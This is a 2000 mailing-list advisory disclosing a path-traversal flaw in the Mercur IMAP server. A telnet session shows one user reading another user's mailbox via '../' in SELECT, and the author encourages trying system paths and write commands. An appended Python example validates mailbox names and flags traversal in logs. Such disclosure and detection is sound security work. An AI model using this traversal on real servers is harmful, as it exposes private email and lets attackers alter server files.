Subject: Security problems with Atrium Mercur Mailserver 3.20
From: Leonid Medvedev (home) (user07ASK-DESIGN.COM)
Date: Thu Apr 13 2000 - 13:23:18 CDT


Hello, List.
I do not even know how to classify this vulnerability.
You can remotely read other users' email,
you can remotely fill up the server's HDD,
you can remotely put files anywhere on the server (at least on the drive where mail
is stored),
you can sometimes crash its IMAP service...

Simple scenario: remote user1 manages mail in user2's mailbox and even alters the
filesystem anywhere on the server's HDD.

we>telnet target.mercur.mailserver 143

server>* OK MERCUR IMAP4-Server (v3.20.02 Unregistered) for Windows NT ready
at Thu, 13 Apr 2000 20:08:31 +0400

we>000c login user1 password1

server>000c OK LOGIN completed

we>00ab select inbox/../../user2/inbox

server>* 1 EXISTS
server>* 0 RECENT
server>* OK [UNSEEN 0]
server>* OK [UIDVALIDITY 878969124]
server>* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
server>00ab OK [READ-WRITE] SELECT completed

we>000e uid fetch 1:*(rfc822.header rfc822.size uid flags internaldate)

server>* 1 FETCH (UID 879030620 RFC822.SIZE 867 FLAGS (\Seen) INTERNALDATE
"12-Apr-2000 19:49:23 +0400")
server>* 2 FETCH (UID 879554127 RFC822.SIZE 1092 FLAGS (\Seen) INTERNALDATE
"13-Apr-2000 19:46:19 +0400")
server>000e OK UID FETCH completed

we>000f uid fetch 879030620 (body.peek[] uid)

server> sends us user2 mail message

Voila! We can read ANY message in ANY known user's mailbox or folder.
But this is not the end :)
Mobilize your own fantasy and try other IMAP commands
(especially those that create/delete folders and send data to the server)
with paths like "..\..\..\..\.." or "..\..\..\..\..\WINNT\SYSTEM32" or
anything...
You do not even need telnet; you can try some IMAP-compliant mail clients.

By the way, the Mercur IMAP service crashes some (not all) of the time with paths
containing dots and slashes.

Ufff... it was hard for me to write such a long letter in English :)
Bye!
------------------------------
Regards, Leonid Medvedev, MCP.
Online Organizer - http://mail.krossinform.ru
Unofficial Russian IELTS Page - http://www2.ask-design.com/ielts
Moscow, Russia.
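A server-side mailbox-name check and a log sweep for the traversal shown in the post above, as an added example that is not part of the original message or of the Mercur product; the mail-store path, the user name, the log lines and all function names are constructed assumptions:

```python
import posixpath
import re

# Hypothetical per-server mail store; a real server would read this from config.
MAIL_ROOT = "C:/Mercur/Mail"
_DRIVE_OR_UNC = re.compile(r"^(?:[A-Za-z]:|[\\/]{2})")


def resolve_mailbox(user: str, mailbox: str) -> str:
    """Map a client-supplied IMAP mailbox name to a path under the user's own
    directory, or raise ValueError. Both '/' and '\\' count as separators,
    since Windows accepts either (the post uses both forms)."""
    if _DRIVE_OR_UNC.match(mailbox):
        raise ValueError("absolute or UNC mailbox name rejected")
    parts = [p for p in re.split(r"[\\/]+", mailbox) if p not in ("", ".")]
    if not parts or ".." in parts:
        raise ValueError("mailbox name must not be empty or contain '..'")
    user_root = posixpath.join(MAIL_ROOT, user)
    resolved = posixpath.normpath(posixpath.join(user_root, *parts))
    # Containment check even after filtering, so a future edit to the
    # filtering above cannot silently reopen the hole.
    if not resolved.startswith(user_root + "/"):
        raise ValueError("resolved path escapes the user's mailbox root")
    return resolved


def is_safe_mailbox(user: str, mailbox: str) -> bool:
    try:
        resolve_mailbox(user, mailbox)
        return True
    except ValueError:
        return False


# Commands that take a mailbox name; tag, command, optional quoted name.
_MBOX_CMD = re.compile(
    r'^\S+\s+(?:SELECT|EXAMINE|CREATE|DELETE|RENAME|APPEND)\s+"?([^"\s]+)', re.I)


def flag_traversal(log_lines, user="user1"):
    """Return (line, mailbox) pairs from IMAP command logs whose mailbox
    argument the check above would reject."""
    hits = []
    for line in log_lines:
        m = _MBOX_CMD.match(line)
        if m and not is_safe_mailbox(user, m.group(1)):
            hits.append((line, m.group(1)))
    return hits
```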